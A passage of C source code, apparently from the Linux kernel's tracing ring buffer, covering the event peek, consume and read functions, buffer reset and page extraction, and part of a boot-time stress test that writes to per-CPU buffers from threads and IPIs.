if ((iter->head >= rb_page_size(iter->head_page)) &&
(iter->head_page != cpu_buffer->commit_page))
rb_inc_iter(iter);
}
static int rb_lost_events(struct ring_buffer_per_cpu *cpu_buffer)
{
return cpu_buffer->lost_events;
}
static struct ring_buffer_event *
rb_buffer_peek(struct ring_buffer_per_cpu *cpu_buffer, u64 *ts,
unsigned long *lost_events)
{
struct ring_buffer_event *event;
struct buffer_page *reader;
int nr_loops = 0;
again:
/*
* We repeat when a time extend is encountered.
* Since the time extend is always attached to a data event,
* we should never loop more than once.
* (We never hit the following condition more than twice).
*/
if (RB_WARN_ON(cpu_buffer, ++nr_loops > 2))
return NULL;
reader = rb_get_reader_page(cpu_buffer);
if (!reader)
return NULL;
event = rb_reader_event(cpu_buffer);
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
if (rb_null_event(event))
RB_WARN_ON(cpu_buffer, 1);
/*
* Because the writer could be discarding every
* event it creates (which would probably be bad)
* if we were to go back to "again" then we may never
* catch up, and will trigger the warn on, or lock
* the box. Return the padding, and we will release
* the current locks, and try again.
*/
return event;
case RINGBUF_TYPE_TIME_EXTEND:
/* Internal data, OK to advance */
rb_advance_reader(cpu_buffer);
goto again;
case RINGBUF_TYPE_TIME_STAMP:
/* FIXME: not implemented */
rb_advance_reader(cpu_buffer);
goto again;
case RINGBUF_TYPE_DATA:
if (ts) {
*ts = cpu_buffer->read_stamp + event->time_delta;
ring_buffer_normalize_time_stamp(cpu_buffer->buffer,
cpu_buffer->cpu, ts);
}
if (lost_events)
*lost_events = rb_lost_events(cpu_buffer);
return event;
default:
BUG();
}
return NULL;
}
EXPORT_SYMBOL_GPL(ring_buffer_peek);
static struct ring_buffer_event *
rb_iter_peek(struct ring_buffer_iter *iter, u64 *ts)
{
struct ring_buffer *buffer;
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
int nr_loops = 0;
cpu_buffer = iter->cpu_buffer;
buffer = cpu_buffer->buffer;
/*
* Check if someone performed a consuming read to
* the buffer. A consuming read invalidates the iterator
* and we need to reset the iterator in this case.
*/
if (unlikely(iter->cache_read != cpu_buffer->read ||
iter->cache_reader_page != cpu_buffer->reader_page))
rb_iter_reset(iter);
again:
if (ring_buffer_iter_empty(iter))
return NULL;
/*
* We repeat when a time extend is encountered or we hit
* the end of the page. Since the time extend is always attached
* to a data event, we should never loop more than three times.
* Once for going to next page, once on time extend, and
* finally once to get the event.
* (We never hit the following condition more than thrice).
*/
if (RB_WARN_ON(cpu_buffer, ++nr_loops > 3))
return NULL;
if (rb_per_cpu_empty(cpu_buffer))
return NULL;
if (iter->head >= rb_page_size(iter->head_page)) {
rb_inc_iter(iter);
goto again;
}
event = rb_iter_head_event(iter);
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
if (rb_null_event(event)) {
rb_inc_iter(iter);
goto again;
}
rb_advance_iter(iter);
return event;
case RINGBUF_TYPE_TIME_EXTEND:
/* Internal data, OK to advance */
rb_advance_iter(iter);
goto again;
case RINGBUF_TYPE_TIME_STAMP:
/* FIXME: not implemented */
rb_advance_iter(iter);
goto again;
case RINGBUF_TYPE_DATA:
if (ts) {
*ts = iter->read_stamp + event->time_delta;
ring_buffer_normalize_time_stamp(buffer,
cpu_buffer->cpu, ts);
}
return event;
default:
BUG();
}
return NULL;
}
EXPORT_SYMBOL_GPL(ring_buffer_iter_peek);
static inline bool rb_reader_lock(struct ring_buffer_per_cpu *cpu_buffer)
{
if (likely(!in_nmi())) {
raw_spin_lock(&cpu_buffer->reader_lock);
return true;
}
/*
* If an NMI die dumps out the content of the ring buffer
* trylock must be used to prevent a deadlock if the NMI
* preempted a task that holds the ring buffer locks. If
* we get the lock then all is fine, if not, then continue
* to do the read, but this can corrupt the ring buffer,
* so it must be permanently disabled from future writes.
* Reading from NMI is a oneshot deal.
*/
if (raw_spin_trylock(&cpu_buffer->reader_lock))
return true;
/* Continue without locking, but disable the ring buffer */
atomic_inc(&cpu_buffer->record_disabled);
return false;
}
static inline void
rb_reader_unlock(struct ring_buffer_per_cpu *cpu_buffer, bool locked)
{
if (likely(locked))
raw_spin_unlock(&cpu_buffer->reader_lock);
return;
}
/**
* ring_buffer_peek - peek at the next event to be read
* @buffer: The ring buffer to read
* @cpu: The cpu to peak at
* @ts: The timestamp counter of this event.
* @lost_events: a variable to store if events were lost (may be NULL)
*
* This will return the event that will be read next, but does
* not consume the data.
*/
struct ring_buffer_event *
ring_buffer_peek(struct ring_buffer *buffer, int cpu, u64 *ts,
unsigned long *lost_events)
{
struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
struct ring_buffer_event *event;
unsigned long flags;
bool dolock;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return NULL;
again:
local_irq_save(flags);
dolock = rb_reader_lock(cpu_buffer);
event = rb_buffer_peek(cpu_buffer, ts, lost_events);
if (event && event->type_len == RINGBUF_TYPE_PADDING)
rb_advance_reader(cpu_buffer);
rb_reader_unlock(cpu_buffer, dolock);
local_irq_restore(flags);
if (event && event->type_len == RINGBUF_TYPE_PADDING)
goto again;
return event;
}
/**
* ring_buffer_iter_peek - peek at the next event to be read
* @iter: The ring buffer iterator
* @ts: The timestamp counter of this event.
*
* This will return the event that will be read next, but does
* not increment the iterator.
*/
struct ring_buffer_event *
ring_buffer_iter_peek(struct ring_buffer_iter *iter, u64 *ts)
{
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
struct ring_buffer_event *event;
unsigned long flags;
again:
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
event = rb_iter_peek(iter, ts);
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
if (event && event->type_len == RINGBUF_TYPE_PADDING)
goto again;
return event;
}
/**
* ring_buffer_consume - return an event and consume it
* @buffer: The ring buffer to get the next event from
* @cpu: the cpu to read the buffer from
* @ts: a variable to store the timestamp (may be NULL)
* @lost_events: a variable to store if events were lost (may be NULL)
*
* Returns the next event in the ring buffer, and that event is consumed.
* Meaning, that sequential reads will keep returning a different event,
* and eventually empty the ring buffer if the producer is slower.
*/
struct ring_buffer_event *
ring_buffer_consume(struct ring_buffer *buffer, int cpu, u64 *ts,
unsigned long *lost_events)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event = NULL;
unsigned long flags;
bool dolock;
again:
/* might be called in atomic */
preempt_disable();
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu];
local_irq_save(flags);
dolock = rb_reader_lock(cpu_buffer);
event = rb_buffer_peek(cpu_buffer, ts, lost_events);
if (event) {
cpu_buffer->lost_events = 0;
rb_advance_reader(cpu_buffer);
}
rb_reader_unlock(cpu_buffer, dolock);
local_irq_restore(flags);
out:
preempt_enable();
if (event && event->type_len == RINGBUF_TYPE_PADDING)
goto again;
return event;
}
EXPORT_SYMBOL_GPL(ring_buffer_consume);
/**
* ring_buffer_read_prepare - Prepare for a non consuming read of the buffer
* @buffer: The ring buffer to read from
* @cpu: The cpu buffer to iterate over
*
* This performs the initial preparations necessary to iterate
* through the buffer. Memory is allocated, buffer recording
* is disabled, and the iterator pointer is returned to the caller.
*
* Disabling buffer recordng prevents the reading from being
* corrupted. This is not a consuming read, so a producer is not
* expected.
*
* After a sequence of ring_buffer_read_prepare calls, the user is
* expected to make at least one call to ring_buffer_read_prepare_sync.
* Afterwards, ring_buffer_read_start is invoked to get things going
* for real.
*
* This overall must be paired with ring_buffer_read_finish.
*/
struct ring_buffer_iter *
ring_buffer_read_prepare(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_iter *iter;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return NULL;
iter = kmalloc(sizeof(*iter), GFP_KERNEL);
if (!iter)
return NULL;
cpu_buffer = buffer->buffers[cpu];
iter->cpu_buffer = cpu_buffer;
atomic_inc(&buffer->resize_disabled);
atomic_inc(&cpu_buffer->record_disabled);
return iter;
}
EXPORT_SYMBOL_GPL(ring_buffer_read_prepare);
/**
* ring_buffer_read_prepare_sync - Synchronize a set of prepare calls
*
* All previously invoked ring_buffer_read_prepare calls to prepare
* iterators will be synchronized. Afterwards, read_buffer_read_start
* calls on those iterators are allowed.
*/
void
ring_buffer_read_prepare_sync(void)
{
synchronize_sched();
}
EXPORT_SYMBOL_GPL(ring_buffer_read_prepare_sync);
/**
* ring_buffer_read_start - start a non consuming read of the buffer
* @iter: The iterator returned by ring_buffer_read_prepare
*
* This finalizes the startup of an iteration through the buffer.
* The iterator comes from a call to ring_buffer_read_prepare and
* an intervening ring_buffer_read_prepare_sync must have been
* performed.
*
* Must be paired with ring_buffer_read_finish.
*/
void
ring_buffer_read_start(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long flags;
if (!iter)
return;
cpu_buffer = iter->cpu_buffer;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
arch_spin_lock(&cpu_buffer->lock);
rb_iter_reset(iter);
arch_spin_unlock(&cpu_buffer->lock);
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
}
EXPORT_SYMBOL_GPL(ring_buffer_read_start);
/**
* ring_buffer_read_finish - finish reading the iterator of the buffer
* @iter: The iterator retrieved by ring_buffer_start
*
* This re-enables the recording to the buffer, and frees the
* iterator.
*/
void
ring_buffer_read_finish(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
unsigned long flags;
/*
* Ring buffer is disabled from recording, here's a good place
* to check the integrity of the ring buffer.
* Must prevent readers from trying to read, as the check
* clears the HEAD page and readers require it.
*/
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
rb_check_pages(cpu_buffer);
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
atomic_dec(&cpu_buffer->record_disabled);
atomic_dec(&cpu_buffer->buffer->resize_disabled);
kfree(iter);
}
EXPORT_SYMBOL_GPL(ring_buffer_read_finish);
/**
* ring_buffer_read - read the next item in the ring buffer by the iterator
* @iter: The ring buffer iterator
* @ts: The time stamp of the event read.
*
* This reads the next event in the ring buffer and increments the iterator.
*/
struct ring_buffer_event *
ring_buffer_read(struct ring_buffer_iter *iter, u64 *ts)
{
struct ring_buffer_event *event;
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
unsigned long flags;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
again:
event = rb_iter_peek(iter, ts);
if (!event)
goto out;
if (event->type_len == RINGBUF_TYPE_PADDING)
goto again;
rb_advance_iter(iter);
out:
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
return event;
}
EXPORT_SYMBOL_GPL(ring_buffer_read);
/**
* ring_buffer_size - return the size of the ring buffer (in bytes)
* @buffer: The ring buffer.
*/
unsigned long ring_buffer_size(struct ring_buffer *buffer, int cpu)
{
/*
* Earlier, this method returned
* BUF_PAGE_SIZE * buffer->nr_pages
* Since the nr_pages field is now removed, we have converted this to
* return the per cpu buffer value.
*/
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
return BUF_PAGE_SIZE * buffer->buffers[cpu]->nr_pages;
}
EXPORT_SYMBOL_GPL(ring_buffer_size);
static void
rb_reset_cpu(struct ring_buffer_per_cpu *cpu_buffer)
{
rb_head_page_deactivate(cpu_buffer);
cpu_buffer->head_page
= list_entry(cpu_buffer->pages, struct buffer_page, list);
local_set(&cpu_buffer->head_page->write, 0);
local_set(&cpu_buffer->head_page->entries, 0);
local_set(&cpu_buffer->head_page->page->commit, 0);
cpu_buffer->head_page->read = 0;
cpu_buffer->tail_page = cpu_buffer->head_page;
cpu_buffer->commit_page = cpu_buffer->head_page;
INIT_LIST_HEAD(&cpu_buffer->reader_page->list);
INIT_LIST_HEAD(&cpu_buffer->new_pages);
local_set(&cpu_buffer->reader_page->write, 0);
local_set(&cpu_buffer->reader_page->entries, 0);
local_set(&cpu_buffer->reader_page->page->commit, 0);
cpu_buffer->reader_page->read = 0;
local_set(&cpu_buffer->entries_bytes, 0);
local_set(&cpu_buffer->overrun, 0);
local_set(&cpu_buffer->commit_overrun, 0);
local_set(&cpu_buffer->dropped_events, 0);
local_set(&cpu_buffer->entries, 0);
local_set(&cpu_buffer->committing, 0);
local_set(&cpu_buffer->commits, 0);
cpu_buffer->read = 0;
cpu_buffer->read_bytes = 0;
cpu_buffer->write_stamp = 0;
cpu_buffer->read_stamp = 0;
cpu_buffer->lost_events = 0;
cpu_buffer->last_overrun = 0;
rb_head_page_activate(cpu_buffer);
}
/**
* ring_buffer_reset_cpu - reset a ring buffer per CPU buffer
* @buffer: The ring buffer to reset a per cpu buffer of
* @cpu: The CPU buffer to be reset
*/
void ring_buffer_reset_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
unsigned long flags;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return;
atomic_inc(&buffer->resize_disabled);
atomic_inc(&cpu_buffer->record_disabled);
/* Make sure all commits have finished */
synchronize_sched();
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
if (RB_WARN_ON(cpu_buffer, local_read(&cpu_buffer->committing)))
goto out;
arch_spin_lock(&cpu_buffer->lock);
rb_reset_cpu(cpu_buffer);
arch_spin_unlock(&cpu_buffer->lock);
out:
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
atomic_dec(&cpu_buffer->record_disabled);
atomic_dec(&buffer->resize_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_reset_cpu);
/**
* ring_buffer_reset - reset a ring buffer
* @buffer: The ring buffer to reset all cpu buffers
*/
void ring_buffer_reset(struct ring_buffer *buffer)
{
int cpu;
for_each_buffer_cpu(buffer, cpu)
ring_buffer_reset_cpu(buffer, cpu);
}
EXPORT_SYMBOL_GPL(ring_buffer_reset);
/**
* rind_buffer_empty - is the ring buffer empty?
* @buffer: The ring buffer to test
*/
bool ring_buffer_empty(struct ring_buffer *buffer)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long flags;
bool dolock;
int cpu;
int ret;
/* yes this is racy, but if you don't like the race, lock the buffer */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
local_irq_save(flags);
dolock = rb_reader_lock(cpu_buffer);
ret = rb_per_cpu_empty(cpu_buffer);
rb_reader_unlock(cpu_buffer, dolock);
local_irq_restore(flags);
if (!ret)
return false;
}
return true;
}
EXPORT_SYMBOL_GPL(ring_buffer_empty);
/**
* ring_buffer_empty_cpu - is a cpu buffer of a ring buffer empty?
* @buffer: The ring buffer
* @cpu: The CPU buffer to test
*/
bool ring_buffer_empty_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long flags;
bool dolock;
int ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return true;
cpu_buffer = buffer->buffers[cpu];
local_irq_save(flags);
dolock = rb_reader_lock(cpu_buffer);
ret = rb_per_cpu_empty(cpu_buffer);
rb_reader_unlock(cpu_buffer, dolock);
local_irq_restore(flags);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_empty_cpu);
#ifdef CONFIG_RING_BUFFER_ALLOW_SWAP
/**
* ring_buffer_swap_cpu - swap a CPU buffer between two ring buffers
* @buffer_a: One buffer to swap with
* @buffer_b: The other buffer to swap with
*
* This function is useful for tracers that want to take a "snapshot"
* of a CPU buffer and has another back up buffer lying around.
* it is expected that the tracer handles the cpu buffer not being
* used at the moment.
*/
int ring_buffer_swap_cpu(struct ring_buffer *buffer_a,
struct ring_buffer *buffer_b, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer_a;
struct ring_buffer_per_cpu *cpu_buffer_b;
int ret = -EINVAL;
if (!cpumask_test_cpu(cpu, buffer_a->cpumask) ||
!cpumask_test_cpu(cpu, buffer_b->cpumask))
goto out;
cpu_buffer_a = buffer_a->buffers[cpu];
cpu_buffer_b = buffer_b->buffers[cpu];
/* At least make sure the two buffers are somewhat the same */
if (cpu_buffer_a->nr_pages != cpu_buffer_b->nr_pages)
goto out;
ret = -EAGAIN;
if (atomic_read(&buffer_a->record_disabled))
goto out;
if (atomic_read(&buffer_b->record_disabled))
goto out;
if (atomic_read(&cpu_buffer_a->record_disabled))
goto out;
if (atomic_read(&cpu_buffer_b->record_disabled))
goto out;
/*
* We can't do a synchronize_sched here because this
* function can be called in atomic context.
* Normally this will be called from the same CPU as cpu.
* If not it's up to the caller to protect this.
*/
atomic_inc(&cpu_buffer_a->record_disabled);
atomic_inc(&cpu_buffer_b->record_disabled);
ret = -EBUSY;
if (local_read(&cpu_buffer_a->committing))
goto out_dec;
if (local_read(&cpu_buffer_b->committing))
goto out_dec;
buffer_a->buffers[cpu] = cpu_buffer_b;
buffer_b->buffers[cpu] = cpu_buffer_a;
cpu_buffer_b->buffer = buffer_a;
cpu_buffer_a->buffer = buffer_b;
ret = 0;
out_dec:
atomic_dec(&cpu_buffer_a->record_disabled);
atomic_dec(&cpu_buffer_b->record_disabled);
out:
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_swap_cpu);
#endif /* CONFIG_RING_BUFFER_ALLOW_SWAP */
/**
* ring_buffer_alloc_read_page - allocate a page to read from buffer
* @buffer: the buffer to allocate for.
* @cpu: the cpu buffer to allocate.
*
* This function is used in conjunction with ring_buffer_read_page.
* When reading a full page from the ring buffer, these functions
* can be used to speed up the process. The calling function should
* allocate a few pages first with this function. Then when it
* needs to get pages from the ring buffer, it passes the result
* of this function into ring_buffer_read_page, which will swap
* the page that was allocated, with the read page of the buffer.
*
* Returns:
* The page allocated, or NULL on error.
*/
void *ring_buffer_alloc_read_page(struct ring_buffer *buffer, int cpu)
{
struct buffer_data_page *bpage;
struct page *page;
page = alloc_pages_node(cpu_to_node(cpu),
GFP_KERNEL | __GFP_NORETRY, 0);
if (!page)
return NULL;
bpage = page_address(page);
rb_init_page(bpage);
return bpage;
}
EXPORT_SYMBOL_GPL(ring_buffer_alloc_read_page);
/**
* ring_buffer_free_read_page - free an allocated read page
* @buffer: the buffer the page was allocate for
* @data: the page to free
*
* Free a page allocated from ring_buffer_alloc_read_page.
*/
void ring_buffer_free_read_page(struct ring_buffer *buffer, void *data)
{
free_page((unsigned long)data);
}
EXPORT_SYMBOL_GPL(ring_buffer_free_read_page);
/**
* ring_buffer_read_page - extract a page from the ring buffer
* @buffer: buffer to extract from
* @data_page: the page to use allocated from ring_buffer_alloc_read_page
* @len: amount to extract
* @cpu: the cpu of the buffer to extract
* @full: should the extraction only happen when the page is full.
*
* This function will pull out a page from the ring buffer and consume it.
* @data_page must be the address of the variable that was returned
* from ring_buffer_alloc_read_page. This is because the page might be used
* to swap with a page in the ring buffer.
*
* for example:
* rpage = ring_buffer_alloc_read_page(buffer, cpu);
* if (!rpage)
* return error;
* ret = ring_buffer_read_page(buffer, &rpage, len, cpu, 0);
* if (ret >= 0)
* process_page(rpage, ret);
*
* When @full is set, the function will not return true unless
* the writer is off the reader page.
*
* Note: it is up to the calling functions to handle sleeps and wakeups.
* The ring buffer can be used anywhere in the kernel and can not
* blindly call wake_up. The layer that uses the ring buffer must be
* responsible for that.
*
* Returns:
* >=0 if data has been transferred, returns the offset of consumed data.
* <0 if no data has been transferred.
*/
int ring_buffer_read_page(struct ring_buffer *buffer,
void **data_page, size_t len, int cpu, int full)
{
struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
struct ring_buffer_event *event;
struct buffer_data_page *bpage;
struct buffer_page *reader;
unsigned long missed_events;
unsigned long flags;
unsigned int commit;
unsigned int read;
u64 save_timestamp;
int ret = -1;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
/*
* If len is not big enough to hold the page header, then
* we can not copy anything.
*/
if (len <= BUF_PAGE_HDR_SIZE)
goto out;
len -= BUF_PAGE_HDR_SIZE;
if (!data_page)
goto out;
bpage = *data_page;
if (!bpage)
goto out;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
reader = rb_get_reader_page(cpu_buffer);
if (!reader)
goto out_unlock;
event = rb_reader_event(cpu_buffer);
read = reader->read;
commit = rb_page_commit(reader);
/* Check if any events were dropped */
missed_events = cpu_buffer->lost_events;
/*
* If this page has been partially read or
* if len is not big enough to read the rest of the page or
* a writer is still on the page, then
* we must copy the data from the page to the buffer.
* Otherwise, we can simply swap the page with the one passed in.
*/
if (read || (len < (commit - read)) ||
cpu_buffer->reader_page == cpu_buffer->commit_page) {
struct buffer_data_page *rpage = cpu_buffer->reader_page->page;
unsigned int rpos = read;
unsigned int pos = 0;
unsigned int size;
if (full)
goto out_unlock;
if (len > (commit - read))
len = (commit - read);
/* Always keep the time extend and data together */
size = rb_event_ts_length(event);
if (len < size)
goto out_unlock;
/* save the current timestamp, since the user will need it */
save_timestamp = cpu_buffer->read_stamp;
/* Need to copy one event at a time */
do {
/* We need the size of one event, because
* rb_advance_reader only advances by one event,
* whereas rb_event_ts_length may include the size of
* one or two events.
* We have already ensured there's enough space if this
* is a time extend. */
size = rb_event_length(event);
memcpy(bpage->data + pos, rpage->data + rpos, size);
len -= size;
rb_advance_reader(cpu_buffer);
rpos = reader->read;
pos += size;
if (rpos >= commit)
break;
event = rb_reader_event(cpu_buffer);
/* Always keep the time extend and data together */
size = rb_event_ts_length(event);
} while (len >= size);
/* update bpage */
local_set(&bpage->commit, pos);
bpage->time_stamp = save_timestamp;
/* we copied everything to the beginning */
read = 0;
} else {
/* update the entry counter */
cpu_buffer->read += rb_page_entries(reader);
cpu_buffer->read_bytes += BUF_PAGE_SIZE;
/* swap the pages */
rb_init_page(bpage);
bpage = reader->page;
reader->page = *data_page;
local_set(&reader->write, 0);
local_set(&reader->entries, 0);
reader->read = 0;
*data_page = bpage;
/*
* Use the real_end for the data size,
* This gives us a chance to store the lost events
* on the page.
*/
if (reader->real_end)
local_set(&bpage->commit, reader->real_end);
}
ret = read;
cpu_buffer->lost_events = 0;
commit = local_read(&bpage->commit);
/*
* Set a flag in the commit field if we lost events
*/
if (missed_events) {
/* If there is room at the end of the page to save the
* missed events, then record it there.
*/
if (BUF_PAGE_SIZE - commit >= sizeof(missed_events)) {
memcpy(&bpage->data[commit], &missed_events,
sizeof(missed_events));
local_add(RB_MISSED_STORED, &bpage->commit);
commit += sizeof(missed_events);
}
local_add(RB_MISSED_EVENTS, &bpage->commit);
}
/*
* This page may be off to user land. Zero it out here.
*/
if (commit < BUF_PAGE_SIZE)
memset(&bpage->data[commit], 0, BUF_PAGE_SIZE - commit);
out_unlock:
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
out:
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_read_page);
#ifdef CONFIG_HOTPLUG_CPU
static int rb_cpu_notify(struct notifier_block *self,
unsigned long action, void *hcpu)
{
struct ring_buffer *buffer =
container_of(self, struct ring_buffer, cpu_notify);
long cpu = (long)hcpu;
long nr_pages_same;
int cpu_i;
unsigned long nr_pages;
switch (action) {
case CPU_UP_PREPARE:
case CPU_UP_PREPARE_FROZEN:
if (cpumask_test_cpu(cpu, buffer->cpumask))
return NOTIFY_OK;
nr_pages = 0;
nr_pages_same = 1;
/* check if all cpu sizes are same */
for_each_buffer_cpu(buffer, cpu_i) {
/* fill in the size from first enabled cpu */
if (nr_pages == 0)
nr_pages = buffer->buffers[cpu_i]->nr_pages;
if (nr_pages != buffer->buffers[cpu_i]->nr_pages) {
nr_pages_same = 0;
break;
}
}
/* allocate minimum pages, user can later expand it */
if (!nr_pages_same)
nr_pages = 2;
buffer->buffers[cpu] =
rb_allocate_cpu_buffer(buffer, nr_pages, cpu);
if (!buffer->buffers[cpu]) {
WARN(1, "failed to allocate ring buffer on CPU %ld\n",
cpu);
return NOTIFY_OK;
}
smp_wmb();
cpumask_set_cpu(cpu, buffer->cpumask);
break;
case CPU_DOWN_PREPARE:
case CPU_DOWN_PREPARE_FROZEN:
/*
* Do nothing.
* If we were to free the buffer, then the user would
* lose any trace that was in the buffer.
*/
break;
default:
break;
}
return NOTIFY_OK;
}
#endif
#ifdef CONFIG_RING_BUFFER_STARTUP_TEST
/*
* This is a basic integrity check of the ring buffer.
* Late in the boot cycle this test will run when configured in.
* It will kick off a thread per CPU that will go into a loop
* writing to the per cpu ring buffer various sizes of data.
* Some of the data will be large items, some small.
*
* Another thread is created that goes into a spin, sending out
* IPIs to the other CPUs to also write into the ring buffer.
* this is to test the nesting ability of the buffer.
*
* Basic stats are recorded and reported. If something in the
* ring buffer should happen that's not expected, a big warning
* is displayed and all ring buffers are disabled.
*/
static struct task_struct *rb_threads[NR_CPUS] __initdata;
struct rb_test_data {
struct ring_buffer *buffer;
unsigned long events;
unsigned long bytes_written;
unsigned long bytes_alloc;
unsigned long bytes_dropped;
unsigned long events_nested;
unsigned long bytes_written_nested;
unsigned long bytes_alloc_nested;
unsigned long bytes_dropped_nested;
int min_size_nested;
int max_size_nested;
int max_size;
int min_size;
int cpu;
int cnt;
};
static struct rb_test_data rb_data[NR_CPUS] __initdata;
/* 1 meg per cpu */
#define RB_TEST_BUFFER_SIZE 1048576
static char rb_string[] __initdata =
"abcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()?+\\"
"?+|:';\",.<>/?abcdefghijklmnopqrstuvwxyz1234567890"
"!@#$%^&*()?+\\?+|:';\",.<>/?abcdefghijklmnopqrstuv";
static bool rb_test_started __initdata;
struct rb_item {
int size;
char str[];
};
static __init int rb_write_something(struct rb_test_data *data, bool nested)
{
struct ring_buffer_event *event;
struct rb_item *item;
bool started;
int event_len;
int size;
int len;
int cnt;
/* Have nested writes different that what is written */
cnt = data->cnt + (nested ? 27 : 0);
/* Multiply cnt by ~e, to make some unique increment */
size = (data->cnt * 68 / 25) % (sizeof(rb_string) - 1);
len = size + sizeof(struct rb_item);
started = rb_test_started;
/* read rb_test_started before checking buffer enabled */
smp_rmb();
event = ring_buffer_lock_reserve(data->buffer, len);
if (!event) {
/* Ignore dropped events before test starts. */
if (started) {
if (nested)
data->bytes_dropped += len;
else
data->bytes_dropped_nested += len;
}
return len;
}
event_len = ring_buffer_event_length(event);
if (RB_WARN_ON(data->buffer, event_len < len))
goto out;
item = ring_buffer_event_data(event);
item->size = size;
memcpy(item->str, rb_string, size);
if (nested) {
data->bytes_alloc_nested += event_len;
data->bytes_written_nested += len;
data->events_nested++;
if (!data->min_size_nested || len < data->min_size_nested)
data->min_size_nested = len;
if (len > data->max_size_nested)
data->max_size_nested = len;
} else {
data->bytes_alloc += event_len;
data->bytes_written += len;
data->events++;
if (!data->min_size || len < data->min_size)
data->max_size = len;
if (len > data->max_size)
data->max_size = len;
}
out:
ring_buffer_unlock_commit(data->buffer, event);
return 0;
}
static __init int rb_test(void *arg)
{
struct rb_test_data *data = arg;
while (!kthread_should_stop()) {
rb_write_something(data, false);
data->cnt++;
set_current_state(TASK_INTERRUPTIBLE);
/* Now sleep between a min of 100-300us and a max of 1ms */
usleep_range(((data->cnt % 3) + 1) * 100, 1000);
}
return 0;
}
static __init void rb_ipi(void *ignore)
{
struct rb_test_data *data;
int cpu = smp_processor_id();
data = &rb_data[cpu];
rb_write_something(data, true);
}
static __init int rb_hammer_test(void *arg)
{
while (!kthread_should_stop()) {
/* Send an IPI to all cpus to write data! */
smp_call_function(rb_ipi, NULL, 1);
/* No sleep, but for non preempt, let others run */
schedule();
}
return 0;
}
static __init int test_ringbuffer(void)
{
struct task_struct *rb_hammer;
struct ring_buffer *buffer;
int cpu;
int ret = 0;
pr_info("Running ring buffer tests...\n");
buffer = ring_buffer_alloc(RB_TEST_BUFFER_SIZE, RB_FL_OVERWRITE);
if (WARN_ON(!buffer))
return 0;
/* Disable buffer so that threads can't write to it yet */
ring_buffer_record_off(buffer);
for_each_online_cpu(cpu) {
rb_data[cpu].buffer = buffer;
rb_data[cpu].cpu = cpu;
rb_data[cpu].cnt = cpu;
rb_threads[cpu] = kthread_create(rb_test, &rb_data[cpu],
"rbtester/%d", cpu);
if (WARN_ON(!rb_threads[cpu])) {
pr_cont("FAILED\n");
ret = -1;
goto out_free;
}
kthread_bind(rb_threads[cpu], cpu);
wake_up_process(rb_threads[cpu]);
}
/* Now create the rb hammer! */
rb_hammer = kthread_run(rb_hammer_test, NULL, "rbhammer");
if (WARN_ON(!rb_hammer)) {
pr_cont("FAILED\n");
ret = -1;
goto out_free;
}
ring_buffer_record_on(buffer);
/*
* Show buffer is enabled before setting rb_test_started.
* Yes there's a small race window where events could be
* dropped and the thread wont catch it. But when a ring
* buffer gets enabled, there will always be some kind of
* delay before other CPUs see it. Thus, we don't care about
* those dropped events. We care about events dropped after
* the threads see that the buffer is active.
*/
smp_wmb();
rb_test_started = true;
set_current_state(TASK_INTERRUPTIBLE);
/* Just run for 10 seconds */;
schedule_timeout(10 * HZ);
kthread_stop(rb_hammer);
out_free:
for_each_online_cpu(cpu) {
if (!rb_threads[cpu])
break;
kthread_stop(rb_threads[cpu]);
}
if (ret) {
ring_buffer_free(buffer);
return ret;
}
/* Report! */
pr_info("finished\n");
for_each_online_cpu(cpu) {
struct ring_buffer_event *event;
struct rb_test_data *data = &rb_data[cpu];
struct rb_item *item;
unsigned long total_events;
unsigned long total_dropped;
unsigned long total_written;
unsigned long total_alloc;
unsigned long total_read = 0;
unsigned long total_size = 0;
unsigned long total_len = 0;
unsigned long total_lost = 0;
unsigned long lost;
int big_event_size;
int small_event_size;
ret = -1;
total_events = data->events + data->events_nested;
total_written = data->bytes_written + data->bytes_written_nested;
total_alloc = data->bytes_alloc + data->bytes_alloc_nested;
total_dropped = data->bytes_dropped + data->bytes_dropped_nested;
